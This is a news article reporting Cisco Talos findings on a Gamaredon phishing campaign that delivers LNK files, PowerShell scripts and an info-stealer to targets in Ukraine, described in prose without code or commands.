A Russia-linked state-backed hacker group known as Gamaredon is targeting entities in Ukraine with information stealing malware in a new campaign part of a cyber-espionage operation that has been going on since August 2022.

The threat actor is targeting users in Ukraine with malicious LNK files distributed in RAR archives delivered via phishing emails. The campaign is using multiple modular PowerShell and VBScript (VBS) scripts as part of the infection chain, according to Cisco’s Talos threat research team.

The campaign involves phishing emails purporting to contain information related to the ongoing Russian invasion of Ukraine that deliver Microsoft Office documents with malicious VBS macros, which downloads and opens RAR archives containing LNK files. These LNK files, in turn, download and run the next-stage payload on the infected endpoint.

The Talos team said they found some overlap between the tactics, techniques and procedures (TTPs), malware artifacts and infrastructure used in this campaign and those leveraged in a series of attacks the Ukraine Computer Emergency Response Team (CERT-UA) recently attributed to Gamaredon, which it tracks as UAC-0010 (aka Armageddon, Primitive Bear, Shuckworm, Winterflouder, BlueAlpha, BlueOtso, IronTiden, SectorCO8, Callisto, Trident Ursa).

The group has been active since 2013 and predominantly targets Ukrainian government organizations, critical infrastructure and entities affiliated with Ukraine’s defence, security and law enforcement agencies.

Once opened, the LNK files will attempt to execute MSHTA.EXE and download a malicious PowerShell script, which decodes and executes a second PowerShell script. This script collects data from the victim and uploads it to a remote server.

“The PowerShell code residing in the environment variable is meant to provide the attackers with continued access to the infected endpoint with the capability to deploy additional payloads as desired,” the researchers noted.

The attackers then deploy a payload via the PowerShell script which is an info-stealer that exfiltrates files of specific extensions from the infected endpoint: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z and .mdb. Talos says that they have not observed this particular malware in the previous Gamaredon campaigns. The new malware may be a component of the group’s “Giddome” backdoor family, the researchers said, but they were not able to confirm that so far.

The technical details of this campaign along with Indicators of Compromise (IoCs) can be found here.